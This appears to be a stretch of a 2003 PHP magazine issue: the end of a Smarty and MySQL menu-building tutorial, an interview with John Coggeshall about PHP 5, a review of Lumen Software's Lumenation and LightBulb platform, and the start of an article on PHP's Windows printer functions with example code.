Using this behaviour for individual menu items within a section, one can later on expand our Menu class to support a privilege system that controls whether individual menu items are displayed. After building our section URL ($click) from the $menu_href array we set this variable in our style. We then do the magic by setting our new menu array in our template.

At this stage, it is worth highlighting the Smarty magic from our menu.tmp (Listing 8) for the default style. Most of the Smarty code should at least look slightly familiar by now. We first create a counter with a default value of -1 and choose not to print it. The {counter} variable will be used to define which section we are clicking on within our section URL. The first {foreach} Smarty loop loops over the menu sections and displays each section; the item {foreach} loop then displays a menu item if the display variable in our menu array has been set. In between each ‘foreach’ statement, we build our section and items using the specific HTML. Notice the menu item variables that are set within our item ‘foreach’ loop:
$v.image  Pulls in the menu item image we are using (for our default style all of these images are the same)
$v.href   Contains the item URL
$v.name   The display name of our item URL

Finally, we fetch our Smarty template from the style class to populate our $menu class variable. At last we can display our menu using displayMenu().

Taking it further
Some of you might have noticed a shortcoming in our menu interface. What if we need to build a menu from a dynamic source like a database or LDAP directory? Let’s have a look at building the menu from a database. Listing 10 (menu.sql in the sql directory) contains some SQL to create a new database and add the tables needed to manage our menus. The ‘menu_section’ table contains the different sections for a menu, while the ‘menu_item’ table contains the ‘section_id’ a menu item belongs to, as well as the item’s name, href, image and sort order. In our menu.sql file we include the SQL needed to create the same menu structure as our original example.

Listing 10: menu.sql
create database menu;
grant select, insert, update, delete on menu.* to www@localhost identified by 'www';
use menu;

create table menu_section (
    section_id int not null auto_increment,
    name char(64) not null,
    PRIMARY KEY(section_id)
);

create table menu_item (
    item_id int not null auto_increment,
    section_id int not null,
    name char(64) not null,
    href char(64) not null,
    image char(64) not null,
    sort int not null,
    PRIMARY KEY(item_id)
);

insert into menu_section values(0, 'Company Management');
insert into menu_section values(0, 'User Management');

insert into menu_item values(0, 1, 'Add a new company', 'action.php?function=add_company', 'images/arrow.gif', 1);
insert into menu_item values(0, 1, 'Delete a company', 'action.php?function=del_company', 'images/arrow.gif', 2);
insert into menu_item values(0, 2, 'Add a new user', 'action.php?function=add_user', 'images/arrow.gif', 1);
insert into menu_item values(0, 2, 'Delete a new user', 'action.php?function=del_user', 'images/arrow.gif', 2);

We will be using MySQL as the database. You can create the MySQL tables using the following command, substituting ROOTPW with the root password for your server.

$ mysql -uroot -pROOTPW < menu.sql

Listing 11: class.Sql.php
...
        $this->host = $host;
        $this->database = $database;
        $this->username = $username;
        $this->password = $password;
        if ( !empty($host) )
            $this->connect();
    }

    function connect()
    {
        $this->link = mysql_connect($this->host, $this->username, $this->password);
        mysql_select_db($this->database);
    }

    function query($query)
    {
        $this->result = mysql_query($query, $this->link);
    }

    function nextRow()
    {
        if ( $this->result ) {
            if ( $this->row = mysql_fetch_assoc($this->result) )
                return true;
            else
                return false;
        }
        return false; // no result set to read from
    }

    function getField($key)
    {
        return $this->row[$key];
    }
}

?>
Listing 11 (class.Sql.php) is the database abstraction layer we will be using to access our SQL tables. The class is a work in progress, as you might notice, and we have not included any error checking. Adding an independent SQL database class allows us to use MySQL, Oracle or Postgres without having to change our SqlMenu creation class. Our Sql class is straightforward, containing the following methods:
Sql()       The constructor sets up the host, database, username and password variables and calls connect().
connect()   The connect method creates a MySQL connection to the database and selects the database in question.
query()     The query method performs our database queries.
nextRow()   The nextRow method fetches the next result row as an associative array. nextRow can be called multiple times until it returns false.
getField()  The getField method returns the value of the named column in the current row.
The SqlMenu creation class
Our dynamic SQL menu creation class, Listing 12 (class.SqlMenu.php), creates a menu from the ‘menu_section’ and ‘menu_item’ SQL tables. Listing 13 (menu_sql.php) shows us almost the exact same code used in Listing 2 for creating our menu from an XML file. The only difference is that we create an instance of the SqlMenu class instead of the Menu class. SqlMenu extends the Menu class and the following variables need to be passed:
$heading   The heading of our menu
$style     The menu style we are using
$host      The host our database is running on (normally localhost)
$database  The database we are accessing to get to our menu_section and menu_item tables
$username  The username needed to access the menu database
$password  The password needed to access the menu database

The constructor sets the heading of our menu and creates a new instance of our Sql class to access the menu database. It then calls _buildSqlMenu(). _buildSqlMenu() uses an SQL JOIN statement to retrieve the sections, and items mapped to those sections, from the ‘menu_section’ and ‘menu_item’ tables. We then loop over the result resource and add the section and menu items to a menu array, passing the section name, item name, item href, and item image column values to the _addItem() method.

Next the SqlMenu constructor calls the _buildXML() method to create the menu XML structure we need as a variable to our original Menu class (class.Menu.php). You might remember that the XML structure can either be in a flat file or, if the file does not exist, defined in a variable. Next, we see the beauty of class inheritance, where our SqlMenu class constructor calls our Menu class constructor, using our newly created XML menu structure and our $style variable. The rest of the menu_sql.php file is exactly the same as our menu.php example. Figure 3 shows the result of menu_sql.php.

Figure 3
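The idea behind _buildSqlMenu() and _buildXML() can be sketched without a database. The example below is an illustration only: the $rows array stands in for the rows a JOIN over menu_section and menu_item would return, and the element and attribute names in the generated XML are assumptions, not the markup used by the article's classes.

```php
<?php
// Stand-in for the joined result set; in the article these rows would be
// read one at a time through the Sql class.
$rows = array(
    array('section' => 'Company Management', 'name' => 'Add a new company',
          'href' => 'action.php?function=add_company', 'image' => 'images/arrow.gif'),
    array('section' => 'Company Management', 'name' => 'Delete a company',
          'href' => 'action.php?function=del_company', 'image' => 'images/arrow.gif'),
    array('section' => 'User Management', 'name' => 'Add a new user',
          'href' => 'action.php?function=add_user', 'image' => 'images/arrow.gif'),
);

// Group the items under their section name.
$menu = array();
foreach ($rows as $row) {
    $menu[$row['section']][] = $row;
}

// Emit the XML text; htmlspecialchars() escapes &, <, > and quotes so that
// values from the database cannot break the markup.
$xml = "<menu>\n  <heading>" . htmlspecialchars('php|a') . "</heading>\n";
foreach ($menu as $section => $items) {
    $xml .= '  <section id="' . htmlspecialchars($section) . "\">\n";
    foreach ($items as $item) {
        $xml .= sprintf(
            "    <item href=\"%s\" image=\"%s\">%s</item>\n",
            htmlspecialchars($item['href']),
            htmlspecialchars($item['image']),
            htmlspecialchars($item['name'])
        );
    }
    $xml .= "  </section>\n";
}
$xml .= "</menu>\n";

echo $xml;
```

Producing XML text rather than a ready-made array keeps the database-backed menu on exactly the same code path as the file-backed one, which is what lets the subclass hand its result straight to the parent constructor.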
Conclusion
I hope this article has allowed us to see the possibilities of utilizing disparate technologies to create solid, manageable and reusable components in our PHP development.
About the Author
Leon is a developer based in Cresta, South Africa, who specializes in web application development.
Click HERE To Discuss This Article http://forums.phparch.com/47
Speaker on the High Seas An Interview with John Coggeshall
F E A T U R E
by Marco Tabini
Now that we have finally let the php|cruise cat out of the bag, what better way to get you acquainted with the brilliant minds that will be accompanying us during the cruise than to ask them a few questions about their work, their passion for PHP, and a sneak preview of what topics they plan to tackle during their sessions.

When we decided to organize php|cruise, one of the first people I turned to for a few talk ideas was well-known author John Coggeshall, who has written on PHP for a number of different technical publications (including, very soon, php|architect). I first met John in person last year at PHPCON in New York City, although we had had a few opportunities to chat on the phone and via IRC on the Internet, and we’ve been in constant touch ever since; we even worked together on a couple of projects, such as our proof-of-concept PHP compilers. It is only fitting, therefore, that for the first in a series of interviews with php|c speakers that we’ll be publishing over the next few months, we turned to John for some good ol’ PHP Q&A.
php|a: We’ve heard you’re writing a book on PHP5. Can you give us some details?

John Coggeshall: I’m currently working on the PHP Developer’s Handbook, published by Sams Publishing and due out early next year. The book itself has a strong focus on the practical aspects of PHP programming, with a very strong emphasis on the new PHP 5 technologies. The book’s goal is to provide not only a reference for these new technologies, but also ways that these technologies can actually be used in practical, day-to-day programming to make development of PHP applications more effective. From the new object model to breakthrough extensions such as SQLite, each is covered in great detail.

php|a: Is it hard to keep current with the development of PHP5?

JC: It has been quite the challenge for sure; hitting a moving target is never easy. On top of that, one of the unfortunate side effects of open source development is that solid documentation is often an afterthought to the finished product. I’ve devoted more time than I care to admit exploring and working with PHP 5 to ensure the most accurate content I can provide for my book – and I’m a lot more pale because of it!

php|a: You’ve also done a lot of work extending PHP, including your Tidy extension and your PHP compiler proof of concept. Where do you think your efforts fit in the grand scheme of things?

JC: The PHP Compiler project has been an excellent learning experience when it comes to really understanding the low-level nuts and bolts of the way PHP 5 operates, so I consider it a significant
project for me, personally. When I first started on the project there were a lot of people who didn’t really think a PHP compiler was feasible at all, and now I see more and more projects popping up that are retracing a lot of my steps and exploring the possibilities. I believe it did a lot to push the envelope of where PHP is heading in the future and I’m very proud of it. Tidy, on the other hand, is a much less theoretical project which has generated a lot of interest in the community, since it ties directly into the primary use of PHP as a web scripting language. It is, of course, still a work in progress, but its ability to provide developers with an extremely intuitive way of parsing XHTML/HTML, as well as cleaning, diagnosing, and repairing it, is going to make it a valuable tool for any PHP developer. Developers are tired of trying to use difficult regular expressions to do their HTML processing – and they shouldn’t have to. Tidy will allow developers to extract entire HTML tables, URLs, and more, with only a few lines of intuitive PHP code. To me, personally, that’s quite a valuable tool – which is why I wrote it in the first place!

php|a: Going back to PHP5, do you think it will cause PHP to be accepted in new markets and industries?

JC: Yes, although it’s not quite clear in what ways these new markets will be influenced by the release of PHP 5. Now that PHP supports a stronger object model, work is being done to more tightly integrate it with other languages such as Java, which can only add to the appeal of the language as a whole. Also, although it’s been happening for a while now, more than ever I am witnessing PHP being thought of as more than just a web scripting language, but rather a general-purpose language. Thanks to some very innovative people, it wouldn’t surprise me to see PHP begin to show up in places no one thought possible a year ago.
php|a: Besides the new OOP functionality, what do you think is PHP5’s best new feature?

JC: That’s a tough question; there are a ton of features in PHP 5 that are going to be great for developers. If I had to pick one, I think the feature with the greatest impact will be the addition of SQLite to PHP. Data is always a critical piece of any PHP-based application, and until now your choices were to either store data locally in the file system using some sort of difficult custom file format, or require some sort of database server, such as MySQL. SQLite provides a means for developers to use SQL in any PHP script, and have it run on almost any PHP 5 installation without having to have any additional software installed. That’s a
big step for data storage in PHP, and I expect a lot of developers to begin replacing those outdated flat-file storage systems with SQLite solutions in the post-PHP 5 world.

php|a: Tell us a bit about the sessions you’ll be presenting at php|c.

JC: Well, php|c is going to be quite the experience for me – not only am I going on a cruise (how cool is that, really), but I’ll be giving three different sessions while on board. I’ll be starting the cruise with a talk on graphics manipulation with PHP, which in my eyes is going to be the most “entertaining” of the three to give. This talk will cover the entirety of graphics manipulation with PHP, and will be useful in PHP 4 and PHP 5 alike. When people think of graphics manipulation in PHP, the first thing that comes to mind is, of course, the GD extension. The GD extension is great for drawing geometric shapes, image resizing, and other general-purpose functionality, but lacks some of the graphics functionality many designers have had for years in products like Adobe Photoshop or GIMP. There are, however, graphics extensions which haven’t received a lot of attention that, at the very least, complement the GD extension. One such extension is imagick, which provides a great deal of functionality otherwise lacking, such as embossing, edge-finding, and other filters. Expect to be assaulted with the nuts and bolts of using both of these extensions during my talk, including some PHP 5-specific graphics tools. I won’t discuss the new PHP 5 technologies here – you’ll just have to come to the talk if you want to learn about those!

Along the same lines as my graphics talk, I’ll also be giving a talk on creating the elusive PDF document dynamically with PHP. Effectively creating PDF files with PHP is a difficult task; however, there are a few tricks of the trade which can make it much easier. I’ll start off in this talk with a discussion of some of the basic PDF manipulation functions that will get you started, and then move on to some lesser-known functionality and techniques which can help you make the most of your time when creating PDFs from within PHP. By the time the talk is over, you’ll have some solid, practical tools that will get you from script concept to completion, creating dynamic PDF documents fast and, hopefully, with less of a headache.

My final talk during the cruise is going to focus on one of the most important topics in PHP development today – content management. When it comes to web development there are two sides of the coin to a successful web site – the designers and the programmers. Designers often know little about programming, and, if you’ve ever looked at a programmer’s web site, programmers generally don’t know very much about design. Ideally, it’d be nice to keep the designers out of the web site application logic (which provides the real functionality), and keep the developers out of the site’s presentation logic (which provides the look and feel). There are countless ways to go about trying to reach this goal, and in this talk I’ll be focusing on one of the most well-thought-out PHP solutions – the Smarty templating engine. Smarty is one of the most unusual web template systems that I have ever seen, and, without a doubt, one of the most flexible available in PHP. Surprisingly enough, not many people are very familiar with the product – this talk hopes to correct that. I’ll start off by introducing Smarty by answering the all-important question “Why should I care?”, and then start getting into the details of using Smarty effectively within a web site. When it comes to details, expect to be introduced to all of the fundamentals of using Smarty to design web sites, such as template variables, modifiers, functions, caching, filters and plug-ins. The goal of this talk is to take someone who has little or no knowledge of using Smarty and provide them with the necessary tools to begin using it that very day. I think it’ll be a good wrap-up, both for me and the conference as a whole.
PRODUCT REVIEW
Lumenation and LightBulb
Lumen Software (http://www.lumensoftware.com)
I was browsing one day, as I often do, looking for interesting PHP developer products to review, when I stumbled across something called EzSDK (now known as LightBulb). I looked around a little, thinking this was just another application framework. I soon found out that it was much more. It was actually an entire web application development platform. I was intrigued. I contacted Lumen Software for more information, and ended up getting a couple of fully guided web-conference tours of the system. Incidentally, one of these tours was rather suddenly interrupted by my very pregnant wife stating that “We’d better get to the hospital... NOW!” Incredibly, an hour and a half later I held a new son in my arms. Anyway, I digress – back to the system. It turns out that this development platform is even more than that. Not only do you develop applications through it (using the SDK, known as LightBulb), those applications also run within it (using the middleware, known as Lumenation)!

What’s the big idea?
At its root, the idea is essentially platform independence. The middleware generally runs on Linux servers, which Lumen will provide – preloaded – to customers. Users of the system can run just about any operating system (as long as it supports a Mozilla 1.4+ browser), and experience a familiar desktop environment over the web, from inside their browser. This makes it ideal for legacy networks, such as those found in school districts. Users can log into the system using their very old Apple Macintosh computers, and have virtually the same desktop experience as somebody running the latest P4. Customers are able to leverage the price point and performance of Linux servers running PHP and Apache, while users are able to access their data with a consistent interface from anywhere, at any time, and with great responsiveness. The system is designed to run over a 28.8K dial-up connection, and performs extremely well. Personally, I’ve used local GUIs with more latency than Lumenation, and Lumenation runs over the very unpredictable internet. Applications (to run on the virtual desktop, as well as on the web) can be developed very rapidly and with little expertise (using LightBulb), or developed by hand to run on the Lumenation middleware. These applications might be data entry or retrieval systems; they might be large data reporting systems; they might even be something completely funky and other-worldly.

Lumenation and LightBulb
Lumenation truly is an amazing piece of work. It is a very complete web application, written entirely in PHP, that, among other things, simulates a (very nicely done) desktop environment. Lumenation (the middleware) and LightBulb (the SDK) provide a number of useful functionalities to application developers:
• a simple source code versioning tool
• offers hooks into the centrally-administered access control system (on an application level, as well as a data level)
• the data dictionary - The data dictionary is a full-featured database manager where you can manage everything to do with your databases. It supports most major database engines, and offers the same sorts of management features as desktop applications.
• the application builder - The application builder is where you can very easily and rapidly build data entry, data update, and data viewing systems. This application is impressive; the code it generates is very simple, but the applications it produces are very powerful.
• the report builder - The report builder offers the ability to dynamically build tabulated reports of your data – similar in concept to a reporting tool like Crystal Reports. It can output HTML, CSV, RTF or PHP code, allowing you to embed it in your applications.
• the page builder - The page builder is a website development tool. It is similar in concept to Dreamweaver, and has a very cool Object Inspector feature, which allows you to select text and modify all relevant stylesheet properties easily.
• support for working with multiple major database engines simultaneously
• easy integration of common features, such as spell checking, into your own applications
• built-in application use tracking and reporting

The benefits for end users are numerous, as well.
Figure 1
• a common look and feel for applications
• a multitasking desktop interface, through the browser
• the help desk manager (a bug tracking tool) - The tracker is also available outside of the system (at a regular website), so users experiencing difficulties logging in to the system, etc. can still access it
• the help center (a system help utility)
• a calculator application
• a calendar application
• a standard text editing application
• a file manager application

Probably the best thing from an end-user perspective is that it offers a low barrier to entry for developing your own simple custom applications. The application builder doesn’t require a degree in computer science to operate, and mixing it up with report builder and page builder is not difficult. Hardcore developers would develop an application using application builder, and then hack it up, but I see no reason that non-programmers couldn’t still build complex and complete applications without writing any code.

On the horizon
Lumen Software is constantly working on making this system more self-contained, so that the end user doesn’t need anything more than a web browser on their computer. With the addition of two new applications in the near future, they are taking big steps in that direction. The source code editor, whose release is planned within the next month, will feature full integration with the SQL editor. It will also contain a large assortment of other features to make it easier to develop applications for the system. Another development planned soon is a built-in word processing application. Considering how usable their desktop and other applications are, I’m sure this will be a really interesting and useful addition to the family.

What I liked
I’m going to say this up front, because it needs to be said: this system is cool. From a developer’s
Figure 2
perspective, it is an incredible feat. When you consider the lofty goals they’ve set, and the system that has resulted, they must have some very intelligent and dedicated people working on it. The first thing that stood out to me was the speed of the system. Even seemingly complex applications usually loaded sub-second, even with the overhead that I’m sure the virtual desktop and all the JavaScript incurs. I never waited more than a second, maybe two, for a page. The second thing was the usability. The GUI that the Lumenation middleware provides to applications is intuitive and is a solid implementation of the desktop metaphor. The user experience is amazing, especially when you consider that you are using nothing but a browser. Task switching, files on the desktop, right-click functionality – pretty cool. The built-in developer applications (page builder, application builder, report builder, data dictionary) are very cool. They work very well and consistently, and are excellent tools for developing large or small applications. The data dictionary is especially good, as it allows you to do things like auto-discovery of database layouts. The code generated by application builder is very easy to understand and augment.

Lumen Software Pricing 8/25/03

Lumen Solutions can be purchased as software solutions or as bundled solutions on optimized hardware from IBM, Gateway, and Toshiba. Prices here reflect software solutions only. For pricing on a bundled solution including an optimized server, please contact Lumen Sales at: 509-455-6720.

LightBulb Suite: $590.00
    Lumenation Middleware Environment
    One Developer License
    Software Development Kit
    Data Dictionary
    Query Builder
    Web Content Manager
*Additional Developer Licenses: $395.00 per Developer

User Licenses: $12.00 per User
    Standard User Licenses are for all

Modules
Modules can be purchased to complement the functionality of the LightBulb Suite as an add-on solution or as freestanding products.

                                              Add-On     Freestanding
Development:
    Web Content Management System             $395.00    $590.00
    Report Management System for Developers   $395.00    $590.00
Productivity:
    CRM                                       $495.00    $690.00
    HelpDesk Manager                          $495.00    $690.00
    Calendar                                  $495.00    $690.00
    Enterprise Report Management System       $495.00    $690.00

The user management system is easy to hook up to, and offers a great deal of flexibility, working at the application and data levels. The source code revision control feature is pretty cool. It is very basic, but at least it’s there. You automatically get the ability to roll back to a previous version of your code, and it’s all handled pretty much seamlessly.

What I didn’t like
The biggest downside that I can see now is that Mozilla is the only supported browser. I can understand why they did it, since Mozilla runs on just about anything, and is much more standards-compliant than something like IE, but moving into larger corporate networks might offer a different reality. Often users are given a drive image, and that’s what they get. The less the IT department has to maintain, the better. Having to install extra, “special” software on everybody’s machine in a large corporate environment might pose additional challenges (although they’d have to do this if they were using something like Citrix Metaframe, so maybe it’s a non-issue...). Still, the browser dependency bugs me. The source control is very basic. It offers rollbacks, but no comparisons, etc. Sure, if you have access to the server, you could go down to system level and do a diff, but it wouldn’t be hard to wrap a system command like that, and it would make a world of difference to the source control system. Creating more complex applications than the builders can create requires that you modify the code that comes out of the application builder, and there is no good way to do that in the system. I did not find the text editor to be very reliable, and the code editor is still a few weeks off. To modify the code, you are pretty much forced to dive down to system level, and use your favorite editor.

Wrapping Up
I really don’t think I can do a system like this justice in a short little article like this. Browse over to Lumen’s website (http://www.lumensoftware.com), and have a look at Lumenation and LightBulb – see what they can do for you. I can think of lots of uses in lots of sectors, and I think there are significant amounts of money to be saved by adopting a system like this. I’m giving them a 4 out of 5 for a great product.
This information reflects Lumen's pricing as of August 25th, 2003. Lumen retains the right to change or modify its pricing at its discretion.
FEATURE
Printing with PHP
by Alessandro Sfondrini
Introduction
The PHP printer functions were introduced in PHP 4.0.4, and they only work under the Microsoft Windows operating system. The most commonly misunderstood fact about these functions is that the printer must be connected to the server (or be a printer on the server's network), not to the client. These printer functions may be very useful in an intranet; for instance, if we have to print lots of similar letters (like the Microsoft Word mail merge function does), the dump of a database, or some data a user has sent us from a form. We can also print to a file using software like Adobe Acrobat Distiller or Adobe Acrobat PDFWriter. There are lots of other uses; these are just some of the common ones.

There are mainly two different ways to print with PHP. The easiest one is to print in plain text, which may often be enough. The other is to print in formatted text, and this is more complex. We will have to set the coordinates of each line of text, while to print a table we will have to draw lines and rectangles. Don't be afraid – it isn't so hard! In this article, we'll take a look at the most important printer functions, write an application to print some form data as unformatted text, and write another application to read data from a database table and print it using tables and formatted text.

Installation
To use the printer functions we only have to add (or uncomment) this line in the php.ini file:
extension=php_printer.dll
We can also set a default printer in the php.ini file using its name as it is displayed in your Windows printers folder. To do this simply add or edit this line:

printer.default_printer = "My Printer Name"

This isn't required, but it's strongly recommended because it will help us to keep our code cleaner. We can also use ini_set() to set it:

ini_set('printer.default_printer', 'My Printer Name');

If we want to use a network printer, we only have to write this:

printer.default_printer = "\\\My PC Name\My Printer Name"
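Before relying on either setting, a script can check whether the printer functions are available at all and which printer name it would end up using. The following is only a minimal sketch: choose_printer_name() is a hypothetical helper that is not part of the printer extension, and the printer names in it are made up for illustration. Only function_exists() and ini_get() are standard PHP.

```php
<?php
// Hypothetical helper (not part of the printer extension): pick the name to
// pass to printer_open(), preferring an explicit name over the php.ini default.
function choose_printer_name($explicit, $iniDefault)
{
    if (is_string($explicit) && trim($explicit) !== '') {
        return trim($explicit);
    }
    if (is_string($iniDefault) && trim($iniDefault) !== '') {
        return trim($iniDefault);
    }
    return null; // nothing configured
}

if (!function_exists('printer_open')) {
    // The extension is missing: check the extension=php_printer.dll line.
    echo "printer functions are not available\n";
} else {
    $name = choose_printer_name(null, ini_get('printer.default_printer'));
    echo $name === null
        ? "no default printer configured\n"
        : "default printer: $name\n";
}
```

Keeping the decision in a small function like this makes it possible to test the fallback logic on a machine that has no printer installed.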
REQUIREMENTS
PHP: 4.0.4+ w/ php_printer.dll enabled
OS: Windows 9x/ME/NT/2000/XP
Applications: MySQL 3.x+
Code Directory: printer
Now that we have set up our php.ini file, we can analyze some of the basic functions that we'll need to print any kind of text.

Basic functions
Generally, we can work with the printer functions similarly to database or file functions. We first open a connection to a printer and create a document in the spooler, then we print whatever we need and close the connection. We mustn't forget to use the connection handle where it's needed, because it can't be omitted. Let's look at some functions.
mixed printer_open ([string devicename])

This function opens the connection to a printer, specified in devicename, and returns the connection handle. This handle is needed to use most of the printer functions. If no device name is passed in, the default printer specified in the php.ini file is used.

void printer_close (resource handle)

This function closes the connection to the printer.

bool printer_start_doc (resource handle[, string documentname])

This function starts a document, and adds it to the printer spooler. We have to use this function every time we want to print. If we want to print to a file, we must specify documentname, which will become the file's name. If no documentname is passed in, the output file will be named “PHP Generated Document”.

bool printer_end_doc (resource handle)

This function closes the document in the printer spooler, and sends it to the printer.

bool printer_start_page (resource handle)

This function starts a new page. It's always required with printer_draw_*() functions, as we'll see, but it also may be needed with printer_write() if you use a modern printer.

bool printer_end_page (resource handle)

This function ends the current page. It must be used after printer_start_page().

void printer_abort (resource handle)

This function deletes the printer spool file and aborts the printing process.

bool printer_set_option (resource handle, int option, mixed value)
This function is important, and is used to set many different printer options. It works similarly to ini_set(). Here are the options we may need to set:

• PRINTER_COPIES: how many copies should be printed.
• PRINTER_MODE: the type of data; value must be “TEXT”, “RAW” or “EMF”.
• PRINTER_RESOLUTION_X, PRINTER_RESOLUTION_Y: specifies the X or Y resolution in DPI. If you use an old printer, this option may not work.
• PRINTER_PAPER_FORMAT: specifies the paper format. The value can be one of the following constants:
    • PRINTER_FORMAT_LETTER: standard letter format (8.5x11 inches)
    • PRINTER_FORMAT_LEGAL: standard legal format (8.5x14 inches)
    • PRINTER_FORMAT_A3: standard A3 format (297x420 millimeters)
    • PRINTER_FORMAT_A4: standard A4 format (210x297 millimeters)
    • PRINTER_FORMAT_A5: standard A5 format (148x210 millimeters)
    • PRINTER_FORMAT_B4: standard B4 format (250x354 millimeters)
    • PRINTER_FORMAT_B5: standard B5 format (182x257 millimeters)
    • PRINTER_FORMAT_FOLIO: standard FOLIO format (8.5x13 inches)
    • PRINTER_FORMAT_CUSTOM: lets you specify a custom paper format. You can set it using PRINTER_PAPER_LENGTH and PRINTER_PAPER_WIDTH (value must be an integer in millimeters)
• PRINTER_TEXT_COLOR: specifies text color; value must be a string containing the RGB information in hex format, e.g. "0000FF".
• PRINTER_BACKGROUND_COLOR: specifies the background color; as in the previous case, value must be a string containing the RGB information in hex format.
• PRINTER_TEXT_ALIGN: specifies the text alignment; if you use an old printer, this option may not work. The value can be one of the following constants:
    • PRINTER_TA_BASELINE: aligned at the base line.
    • PRINTER_TA_BOTTOM: aligned at the bottom.
    • PRINTER_TA_TOP: aligned at the top.
    • PRINTER_TA_CENTER: aligned at the center.
    • PRINTER_TA_LEFT: aligned at the left.
    • PRINTER_TA_RIGHT: aligned at the right.
• PRINTER_SCALE: specifies the factor by which the printed output should be scaled. The page size is scaled from the physical page size by a factor of value/100. For example, if you set the scale to 50, the output would be half of its original size. Value must be an integer. If you use an old printer, this option may not work.

mixed printer_get_option (resource handle, string option)
Returns the value of option, which can be one of the constants described above. This function is very useful when you want to know things like the printer resolution in dots per inch.

bool printer_write (resource handle, string content)

This function writes RAW data to the printer. It can be used to easily print plain text, but we must set PRINTER_MODE to RAW first. This function is very easy to use because it accepts special chars like “\n\r”, “\t”, etc. and, with some printers, automatically starts new pages when needed (with most modern ones you must start and end each page manually with printer_start_page() and printer_end_page()).
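Two of the options above take values that are easy to get wrong by hand: the color options expect a six-digit hex string, and PRINTER_SCALE works as a percentage. The sketch below shows one way to compute both. rgb_to_printer_color() and scaled_size() are hypothetical helpers, not functions of the printer extension, and the guarded block at the end only runs where printer_open() is available.

```php
<?php
// Hypothetical helpers, not part of the printer extension.

// Build the "RRGGBB" hex string expected by PRINTER_TEXT_COLOR and
// PRINTER_BACKGROUND_COLOR from three 0-255 components.
function rgb_to_printer_color($red, $green, $blue)
{
    $parts = array();
    foreach (array($red, $green, $blue) as $component) {
        $component = max(0, min(255, (int) $component)); // clamp to one byte
        $parts[] = sprintf('%02X', $component);
    }
    return implode('', $parts);
}

// Size that results from PRINTER_SCALE: physical size times value/100.
function scaled_size($physicalSize, $scale)
{
    return $physicalSize * $scale / 100;
}

echo rgb_to_printer_color(0, 0, 255), "\n"; // 0000FF (blue)
echo scaled_size(210, 50), "\n";            // 105: half the width of an A4 page

// Only touches a printer when the extension is available.
if (function_exists('printer_open')) {
    $handle = printer_open();
    if ($handle) {
        printer_set_option($handle, PRINTER_TEXT_COLOR, rgb_to_printer_color(0, 0, 255));
        printer_close($handle);
    }
}
```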
Printing colored text
When we print any kind of text we can set its color just as we set its size or weight. To print colored text we use printer_set_option() to set PRINTER_TEXT_COLOR to the RGB value for the required color. This color stays in effect for the rest of the document, so if we want to use different colors, we must set the option again each time the color changes.

A simple application: Print form data using printer_write()
Here is our first example application. Let's suppose we want to print some data that a user has sent us from a form. He's just ordered a book from our website, and we want to print a copy of the order. Of course, this user should be in a restricted area, and would likely be sending us data in the $_POST or $_SESSION arrays. This is not important in order to use printer functions, though, so let's imagine we have already written all the code we may need to authenticate the user and check those arrays.

Let's look at the first part of Listing 1. First, we set some vars – the ones that the user could send us. I used $varname instead of $_POST[“varname”] in the interests of brevity. Next, we write the text to print in the $text var. Note that it is plain, unformatted text, but we can use special chars like newline or tab. To insert a newline we must use “\n\r”, not only “\n”, or there will be no carriage return and the new line will start directly below the position on the line where the previous one ends. Remember we always have to end each line manually.

We can now open a connection to the printer to print the text. We must first set the printer mode to “RAW” using printer_set_option(), as this is required to use printer_write(). Most complex functions used to print formatted text require “TEXT” mode, so modern printers default to “TEXT” mode. We may need to start the page using printer_start_page() before writing text and end it with printer_end_page(). As we said, it depends on your printer: older printers don't need these functions, but the modern ones do. The only way to find out how your printer behaves is by running some test code like this. In our example the functions are included: comment the lines out if you need to. Now we can send the text to the printer using printer_write(). Remember that this function
Listing 1

<?php
/* We set some vars that a user could have sent us */
/* If this were a real application they would be contained in $_POST */
$name = "John Smith";
$address = "1, This Street";
$city = "Toronto";
$country = "Canada";
$creditcardno = "123456789-ABC";
$title = "How to use PHP printer functions";
$price = "10.00 USD";
$isbn = "12-345-6789-X";

/* Now we write the text to print */
$text = "\t\t\tBOOK ORDER"; // We can use the tab special char
$text .= "\n\r\n\r\n\r\n\r\n\r"; // And newline ones
$text .= "We received this order ".date("l, M dS Y")." at ".date("H:i:s")."\n\r\n\r";
$text .= "From $name\n\r\n\r";
$text .= "Address: $address - $city, $country\n\r\n\r";
$text .= "Credit card number: $creditcardno\n\r\n\r\n\r\n\r";
$text .= "The book ordered is the following:\n\r\n\r";
$text .= "Title: $title\n\r";
$text .= "ISBN code: $isbn\n\r\n\r";
$text .= "Price: $price";

/* And we print it */
$handle = printer_open(); // Opens the connection
printer_set_option($handle, PRINTER_MODE, "RAW"); // Sets the printer mode
printer_start_doc($handle, "Book order"); // Creates the document and sets its title
printer_start_page($handle); // Starts the page. Only needed with modern printers.
printer_write($handle, $text); // Prints the text
printer_end_page($handle); // Ends the page. Only needed with modern printers.
printer_end_doc($handle); // Closes the document
printer_close($handle); // Closes the connection

/* -- SECOND PART -- */

/* First we connect to the DB */
$conn = mysql_connect();
mysql_select_db('mydbname');
$res = mysql_query("SELECT * FROM products ORDER BY id ASC", $conn);
mysql_close($conn);

/* Then we set up printer functions & tools */
$handle = printer_open();
printer_start_doc($handle, 'Dumping data from products');
printer_start_page($handle);
$x = printer_get_option($handle, PRINTER_RESOLUTION_X) / 300; // Gets X res
$y = printer_get_option($handle, PRINTER_RESOLUTION_Y) / 300; // And Y res

/* $bigtitle is an ultrabold big font */
$bigtitle = printer_create_font('Comic Sans MS', 140*$y, 60*$x, PRINTER_FW_ULTRABOLD, false, false, false, 0);
/* $smalltitle is a bold medium font */
$smalltitle = printer_create_font('Times New Roman', 70*$y, 30*$x, PRINTER_FW_BOLD, false, false, false, 0);
/* $font is a small font we can use to write into the table */
$font = printer_create_font('Times New Roman', 45*$y, 15*$x, PRINTER_FW_MEDIUM, false, false, false, 0);
/* $pen is the pen we'll use to draw table borders */
$pen = printer_create_pen(PRINTER_PEN_SOLID, 1, "000000");

/* Now we print the titles */
printer_set_option($handle, PRINTER_TEXT_COLOR, "FF0000"); // Sets text color
printer_select_font($handle, $bigtitle); // Selects the font
printer_draw_text($handle, "Our available products", 50*$x, 50*$y); // Writes the title
printer_delete_font($bigtitle); // Deletes the font

/* Now we'll repeat the operation */
printer_set_option($handle, PRINTER_TEXT_COLOR, "000000"); // Sets color to black
printer_select_font($handle, $smalltitle);
printer_draw_text($handle, "Backup of table 'products'.", 50*$x, 220*$y);
printer_draw_text($handle, "Date: ".date("r"), 50*$x, 300*$y);
printer_delete_font($smalltitle);
?>
